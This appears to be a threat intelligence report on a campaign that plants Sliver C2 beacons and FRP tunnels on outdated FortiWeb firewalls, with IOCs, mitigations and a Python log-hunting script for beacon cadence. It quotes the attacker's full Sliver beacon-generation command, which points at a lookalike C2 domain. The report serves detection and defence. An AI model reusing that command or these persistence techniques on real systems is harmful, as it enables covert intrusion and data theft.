
FortiWeb Exploitation Enables Persistent Sliver C2 Deployment

Threat Overview

A threat intelligence report published by CyberHunter_NL on January 6, 2026 details a campaign in which a threat actor has compromised multiple outdated FortiWeb web application firewalls and used them to establish long‑term persistence with the Sliver command and control (C2) framework. The affected devices ran firmware versions 5.4.202 through 6.1.62, and the actor exploited internet‑facing vulnerabilities in appliances that had not been updated, a population that remains sizeable at the enterprise edge.

FortiWeb appliances sit at the perimeter and are treated as trusted, and in its common reverse‑proxy deployment a WAF terminates TLS for the applications it protects, so an implant on the appliance sees decrypted request and response content for those applications. By placing the Sliver implant directly on the firewall, the actor gains that visibility plus the ability to run commands with the appliance's own privileges, on a device where host‑based monitoring is rarely available.

Actor Profile

The group behind this operation is known for methodical use of public exploits and open‑source tooling, including the React2Shell exploit (CVE‑2025‑55182) and the Fast Reverse Proxy (FRP) utility. Its targeting appears focused on South Asia, as suggested by decoy domains that imitate legitimate services, including ns1.ubunutpackages.store (a lookalike of an Ubuntu package mirror) and ns1.bafairforce.army. These domains serve decoy content so that a casual look at the hostname or its landing page appears benign.

Exploitation Pathway

Initial compromise begins with the exploitation of known vulnerabilities in FortiWeb firmware. The report does not confirm which FortiWeb vulnerability was used; CVE‑2025‑55182 is the flaw the same actor has exploited in parallel operations, not an identified FortiWeb entry vector. Once on the appliance, the actor deploys FRP, a reverse‑tunnelling tool, to publish internal services through an outbound connection to an attacker‑controlled server, creating a direct bridge between the victim's internal network and the attacker's infrastructure.

Alongside FRP, the actor generates a Sliver beacon with the following command, recovered from the attacker's own logs: generate beacon --http ns1.ubunutpackages.store --reconnect 120 --strategy r --template ubuntu --os linux --evasion --save ./system-updater --seconds 60. In Sliver's generate beacon syntax, --seconds 60 sets the check‑in interval (the beacon calls back roughly once a minute, with Sliver's default jitter applied because --jitter is not set), --reconnect 120 is the wait between retries when the C2 host cannot be reached, --strategy r picks among the configured C2 URLs in random order, --evasion enables Sliver's built‑in evasion features, and --save ./system-updater gives the Linux implant a filename that resembles an update utility. Only the filename blends in; the periodic outbound HTTP(S) traffic from a WAF appliance is still observable and is the behaviour defenders should key on.

Command and Control Architecture

The attacker’s C2 infrastructure is built around a network of decoy domains and fake repositories. The beacon payload is written to /bin/.root/system-updater on the compromised FortiWeb devices, masquerading as a system update utility. Legitimate‑looking domain names and repository paths make the callbacks resemble package‑update traffic, so controls that rely on domain reputation or simple allow‑lists are unlikely to flag them.

Indicators of Compromise

Security analysts should monitor for the following indicators:

  1. Outbound HTTP/HTTPS traffic to ns1.ubunutpackages.store or ns1.bafairforce.army (ns1.ubunutpackages.store is the C2 hostname passed to Sliver via --http).

  2. A binary named system-updater under /bin/.root/ on FortiWeb appliances; a hidden dot‑directory under /bin is itself suspicious on an appliance filesystem.

  3. FRP listening sockets or tunnels on non‑standard ports, and any unexpected long‑lived outbound connection from the appliance.

  4. Periodic check‑ins from the appliance at roughly 60‑second intervals (the --seconds 60 value in the attacker's generate command), with 120‑second retry spacing (--reconnect 120) while the C2 host is unreachable.

  5. Anomalous outbound traffic from FortiWeb appliances running firmware 5.4.202 to 6.1.62.

Additionally, open‑directory scans of public IPs may reveal exposed Sliver C2 databases and logs, as identified by Ctrl‑Alt‑Int3l analysts.
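As an added example, not taken from the report or from the Sliver project, the script below runs the two network‑side checks above over a handful of constructed proxy log lines: a match against the decoy C2 domains, and a cadence test that flags connection series whose inter‑arrival gaps are nearly constant. It also makes concrete the --seconds versus --reconnect distinction from the Exploitation Pathway section. The log format, the IP addresses and every hostname other than the two IOC domains are invented for illustration; the jitter tolerance assumes Sliver's default 30‑second --jitter, which the quoted generate command does not override.

```python
"""Hunt egress logs for Sliver-style beaconing and the report's decoy C2 domains.

Added example, not code from the report. Two checks per (src, dst) pair:
  1. the destination is a known IOC domain;
  2. the connection times are periodic: the inter-arrival gaps have a low
     coefficient of variation. max_cv=0.25 assumes Sliver's default --jitter
     of 30 s on top of --seconds 60, so gaps land roughly in 60-90 s rather
     than exactly 60 s.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Decoy C2 hostnames named in the report.
IOC_DOMAINS = {"ns1.ubunutpackages.store", "ns1.bafairforce.army"}

# Constructed egress-proxy log lines for this example (not real telemetry):
# "<ISO timestamp> <src_ip> <dst_host> <dst_port>".
#   10.1.1.5: near-exact 60 s cadence to an IOC domain.
#   10.1.1.9: irregular, human-driven traffic to a real-looking mirror.
#   10.1.1.7: jittered 60-90 s cadence to a host that is NOT on the IOC list.
SAMPLE_LOG = """\
2026-01-06T10:00:00 10.1.1.5 ns1.ubunutpackages.store 443
2026-01-06T10:00:59 10.1.1.5 ns1.ubunutpackages.store 443
2026-01-06T10:02:01 10.1.1.5 ns1.ubunutpackages.store 443
2026-01-06T10:03:00 10.1.1.5 ns1.ubunutpackages.store 443
2026-01-06T10:04:00 10.1.1.5 ns1.ubunutpackages.store 443
2026-01-06T10:00:12 10.1.1.9 archive.ubuntu.com 443
2026-01-06T10:07:40 10.1.1.9 archive.ubuntu.com 443
2026-01-06T10:21:05 10.1.1.9 archive.ubuntu.com 443
2026-01-06T10:44:51 10.1.1.9 archive.ubuntu.com 443
2026-01-06T11:10:01 10.1.1.9 archive.ubuntu.com 443
2026-01-06T10:00:00 10.1.1.7 updates.example.net 443
2026-01-06T10:01:11 10.1.1.7 updates.example.net 443
2026-01-06T10:02:34 10.1.1.7 updates.example.net 443
2026-01-06T10:03:38 10.1.1.7 updates.example.net 443
2026-01-06T10:05:06 10.1.1.7 updates.example.net 443
2026-01-06T10:06:08 10.1.1.7 updates.example.net 443
"""


def parse_log(text):
    """Group connection timestamps by (src_ip, dst_host)."""
    events = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, _port = line.split()
        events[(src, dst)].append(datetime.fromisoformat(ts))
    return events


def cadence_score(times, min_events=4, max_cv=0.25):
    """Return (mean_gap_seconds, cv) when the series looks periodic, else None.

    cv = population stdev of the gaps / mean gap. A beacon with bounded
    jitter stays well under 0.25; interactive or bursty traffic does not.
    """
    if len(times) < min_events:
        return None
    ordered = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
    avg = mean(gaps)
    if avg <= 0:
        return None
    cv = pstdev(gaps) / avg
    return (avg, cv) if cv <= max_cv else None


def hunt(text):
    """Return findings as (src, dst, reason, mean_gap_seconds_or_None) tuples."""
    findings = []
    for (src, dst), times in parse_log(text).items():
        if dst in IOC_DOMAINS:
            findings.append((src, dst, "ioc-domain", None))
        periodic = cadence_score(times)
        if periodic is not None:
            findings.append((src, dst, "beacon-cadence", round(periodic[0])))
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(finding)
```

On the constructed data the IOC check fires for 10.1.1.5 and the cadence check fires for both 10.1.1.5 and 10.1.1.7, while the irregular 10.1.1.9 series is ignored. Cadence alone also matches legitimate pollers (NTP, monitoring agents, update checks), so treat a cadence‑only hit as a triage lead to be combined with destination reputation, the identity of the source (a WAF appliance should not be fetching packages), and the 120‑second retry spacing that appears once the C2 host goes dark.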

Operational Impact

The compromise of FortiWeb devices provides the threat actor with a stable entry point for broader network infiltration. By maintaining persistence on these edge devices, attackers can monitor traffic, exfiltrate data, and pivot to internal assets with minimal lateral movement. The long‑term nature of this campaign poses a significant risk to critical security infrastructure that is typically trusted and less frequently inspected.

Recommendations for Mitigation

  1. Patch Management: Immediately update all FortiWeb appliances to the latest firmware, ensuring that versions 5.4.202 through 6.1.62 are no longer in use. Prioritize devices that are publicly exposed.

  2. Network Segmentation: Restrict FortiWeb management interfaces to a dedicated management network, allow the appliance to reach only the backend servers it protects, and enforce default‑deny egress so the appliance cannot initiate outbound connections to arbitrary hosts; an implant that cannot reach its C2 domain or FRP server is blind.

  3. Endpoint Detection and Response (EDR): FortiWeb is a closed appliance that does not accept third‑party EDR agents, so detection has to come from network telemetry (proxy, DNS and firewall logs covering the appliance's outbound connections), from the appliance's own logs, and from vendor‑supported integrity checks or forensic review of the filesystem for /bin/.root/system-updater and FRP binaries.

  4. Threat Hunting: Conduct regular scans for outbound traffic to known decoy domains and for the specific beacon reconnection pattern. Use threat intelligence feeds to update detection rules.

  5. Incident Response: Prepare a playbook that isolates a suspected FortiWeb device, preserves evidence (logs, configuration and, where Fortinet support can assist, a filesystem or firmware image) before any cleanup, and then rebuilds the appliance from a known‑good firmware image and a reviewed configuration rather than only deleting the implant. Treat credentials and certificates held on the appliance as exposed and rotate them.

  6. Security Awareness: Educate network defenders about the use of decoy domains and the importance of scrutinizing seemingly legitimate traffic, especially from edge devices.

By implementing these controls, organizations can reduce the attack surface presented by legacy FortiWeb appliances and mitigate the risk of persistent adversary presence.

Conclusion

This threat report underscores the evolving tactics of adversaries who exploit trusted security appliances to achieve persistence. The combination of public‑facing vulnerabilities, open‑source tools like FRP, and sophisticated C2 infrastructure demonstrates a high level of operational security and stealth. Security analysts must remain vigilant, applying rigorous patching, segmentation, and monitoring practices to defend against similar campaigns in the future.


Copyright © 2025 ESSGroup
